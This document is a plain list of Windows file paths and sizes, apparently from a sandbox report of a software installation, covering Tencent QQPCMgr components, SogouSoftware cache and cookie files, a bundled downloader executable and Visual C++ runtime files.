    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.tpc (707 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScanPluginMgr.dll (4190 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\ClinicTrayConfig.xml (77 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_125.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SmartInstall.dll (2176 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMHealthAssist.png (894 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCMgr.rdb (7386 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine_Cache\QMCommon.dll (5441 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCFTSysShortTask.exe (2205 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QQPCNetFlow.exe (9466 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\CheckSysHung.dll (3540 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.tpc (684 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmpredownload\QMPreDownload.dll (4260 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.tpc (959 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QQPCNetFlow.dat (832 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMWebFWCtrl\QMWebFWCtrl.rdb (1625 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRouterMgr.dat (712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\pluginctrl.xml (31 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1606.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\SysMalwareJmp.png (832 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRealTimeSpeedup.dat (728 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.tpc (591 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.rdb (126 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\BugReportRule.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\jgIOStub.dll (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetConnect\QMNetConnect.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QMNetMon.rdb (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\TestMSVCR.exe (16 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.tpc (705 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1091.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1008.dat (624 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1607.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftConfig.exe (7946 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameUpgradePlugin\QMGameUpgradePlugin.dll (2138 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\TSVulFWX64.DAT (167 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\AdfilterExtension.sext (177 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetSpeedTest\QMNetSpeedTestDll.dll (1104 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\tpkcom.dll (1855 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant.exe (6384 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine\CommonIcon\exe_gray.ico (82 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1070.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameUpConfig.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1074.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmudiskmgr\USBKey.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.rdb (101 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_533.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tinyxml.dll (1153 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCCommonMgr.rdb (15675 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\IEStartPage.dll (5690 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\notbolock.sys (21 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibwhiteac.xml (965 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftAAL64.sys (244 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\MonitorConfig.etf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpload.exe (2498 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetHlpX64.sys (919 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\PersonaLib.dat (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virinfo.def (52 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMPersonalCenter.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\version.ini (39 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1286.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMWebFWCtrl\QMWebFWCtrl.dll (20613 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\xp.png (26 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.dll (4263 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TpkUpdate.exe (2317 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCUpdate.rdb (1425 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\jgImage.dll (749 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr01.def (28 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1228.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\CommonCallback.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEmMat.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Uninst.exe (14031 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHPScanAv.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\I18N\SSOConfig.xml (394 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1111.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\BlueList.lis (28 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCClinicSys\QQPCClinicSys.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SncLib.dat (264 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepLibDown.dat (12 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMIpc.dll (3202 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\Modules.xml (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSignScan.exe (3204 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1001.dat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1073.dat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTrayPlugin.xml (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10484.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.dll (3914 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\GameBoxPlugin.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1019.dat (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetMonWfp.sys (363 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\QMHPGarbageScan\QMHPGarbageScan.dll (3874 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\XYConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GarbageCleaner.dll (9707 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\AdFilterConfigFile.xml (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GF.dll (17954 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GarbageCleanerScript.dat (40 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\sCheck_Router.png (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysSpeedUp\sysspeedup.tpc (655 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMIEProtectIo.dll (41 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepProv.dll (17989 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1401.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\GFCustom.dll (7112 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\browserlist.dat (13 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\libexpatw.dll (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSZip.dll (647 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\exnscan.dll (3547 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCAVSetting.dat (696 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPConfig.exe (2049 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1020.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPSysScan\HPSysScanner.dll (2399 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAccountProtection.exe (10398 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QMHealthAssist_QO.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\IEStartPage.tpc (707 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\FtsysSoftIcon.dll (2098 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QMGameSpeedup_QO.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMShield32.png (578 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRealTimeSpeedup.rdb (241 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\Bin\SSOCommon.dll (10861 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\RemNPX.exe (1764 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\HPScanUIPlugin\HPScanUIPlugin.dll (6633 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\harddiskmark.etf (40 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCLeakScan.exe (7366 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\InstAsm.exe (1137 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVPedc.dll (2205 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\speech.dat (91 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQFileFlt.dll (838 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\StartupMgr.rdb (9005 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\PluginPackage\InstallCfg.xml (156 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.tpc (905 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\oDayProtect.dll (86 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\Common.dll (17134 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1031.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1223.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRealTimeSpeedup.exe (6074 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHW-x64.sys (512 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\xImage.dll (2533 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMAdFilter.png (545 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\sBoth_Disconnected.png (10 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\supplyID.xml (266 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.tpc (674 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1402.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TVL00001.tvl (6396 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSUrlLib.DAT (15 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\sm03.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\TurnOnAdapter.png (17 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMNetConnect.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\pinyin.lis (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1603.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TestStubConfig.xml (425 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\arkGraphic.dll (5320 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\com.qq.qmchext.json (209 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\xImage.dll (4051 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tssk.sys (1616 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Tencentdl.exe (9871 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1030.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virdex02.def (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10007.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMIESafeDll.dll (2233 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\I18N\2052\PGFStringBundle.xml (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1944.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCUpdate.dat (656 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1095.dat (452 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCMgr.exe (601 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsvulsha.dat (109 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSWebShieldInject.dll (1172 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinic.png (931 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMBDScanner.dat (35 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMNewsTips\QMNewsTips.rdb (22 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\RocketConfig.etf (406 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPExternalScan\HPFirewareScanner.dll (2370 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinicSys.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\qqpclaunch\QQPCLaunch.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernel.sys (852 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.rdb (3744 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_157.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\ATL80.dll (1915 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\libjpegturbo.dll (4099 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMClinicCore.dll (9313 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetflowOpti\NetflowOpti.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDns.dll (62 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.dll (1875 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCVulPage.rdb (1812 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\xImage.dll (2643 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\MalwareLogic.dll (2064 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftCmd.exe (3473 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_115.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\jgIOStub.dll (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1755.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloaderInfo.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\DLProtectComm.dll (1722 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\CODConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10482.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant.rdb (16 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\net_err.jpg (15 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.dll (5038 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_657.png (794 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCAVSetting.exe (7102 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SoftUninstall\SoftUninstall.dll (5765 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\LoadError.html (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftTrayTips.rdb (492 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCLeakScan.dat (704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1415.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmsoftmgrupdate\QMSoftMgrUpdate.dll (2641 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\UDiskShellExt.dll (2502 bytes)
    %Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\LocalInfo.xml (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\SuiteDownloader20160222153349.exe (152096 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\381427456234840[1].jpg (10332 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[4].png (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\ie-css3[1].htc (1115 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[3].png (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[1].jpg (3208 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\link[3].png (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[3].png (10542 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\imagick[1].jpg (696 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (1283 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[2].png (1367 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\link[1].png (2084 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[1].png (6666 bytes)
    %Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\PCID.xml (685 bytes)
    %Documents and Settings%\%current user%\Application Data\SogouSoftware\data\sogousoftware.db (149 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\scroll[1].js (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[4].png (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\loading[1].gif (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\SuiteDownloader20160222153349[1].exe (304936 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (1139 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[4].png (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\jquery-1.11.1.min[1].js (50457 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[3].png (392 bytes)
    %Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\SilentParaReponse.xml (97 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[2].png (5665 bytes)
    %Documents and Settings%\%current user%\Application Data\SogouSoftware\data\sogousoftware.db-journal (86 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[1].png (2675 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\ranking-ico[1].png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\jquery-1.7.2.min[1].js (45457 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (160 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\ie-css3[1].htc (1012 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\741430117543639[1].png (22752 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\ranking-ico[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[2].png (6423 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[1].png (400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\SG.jpeg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\recommend[1].css (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\SogouSoftwareExternalApp[1].exe (1006360 bytes)
    %Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\NewVersionReponse.xml (1 bytes)
    %Program Files%\SogouSoftware\tmp\ExternalApp.exe (595769 bytes)
    %Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\OnlineIconReponse.xml (359 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (1940 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\CC1430117533187[1].png (14468 bytes)
    %Documents and Settings%\%current user%\Application Data\2320808333768086190_4848.jpeg (7 bytes)
    %Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\SoftInfo.xml (809 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\link[2].png (1622 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\ranking[1].css (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\UpdateFiles\QQBrowser_Setup_9.4.7658.400_9.4.exe.qbl (16424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp\F1Assistant.dll (19686 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\UpdateFiles\desc.txt (1 bytes)
    %WinDir%\WinSxS\InstallTemp\732509\Manifests (4 bytes)
    %WinDir%\WinSxS\InstallTemp\776418\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcm80.dll (3073 bytes)
    %WinDir%\WinSxS\InstallTemp\776418\Manifests\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\842843\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773\8.0.50727.4053.Policy (804 bytes)
    %WinDir%\WinSxS\InstallTemp\825721\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcp80.dll (3361 bytes)
